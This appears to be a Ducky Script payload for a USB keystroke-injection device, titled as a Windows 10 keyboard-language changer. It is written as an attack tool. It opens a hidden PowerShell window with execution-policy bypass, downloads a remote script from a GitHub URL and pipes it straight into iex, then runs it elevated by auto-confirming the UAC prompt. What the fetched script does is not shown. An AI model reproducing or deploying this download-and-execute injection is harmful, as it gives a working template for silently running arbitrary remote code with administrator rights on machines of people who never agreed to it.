REM Title: beigeworm's Keyboard Language changer.
REM Author: @beigeworm
REM Description: This script changes the keyboard layout and system language to US.
REM Target: Windows 10

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/assets/main/Scripts/US-keyboard.ps1 | iex
CTRL-SHIFT ENTER
DELAY 3000
ALT y



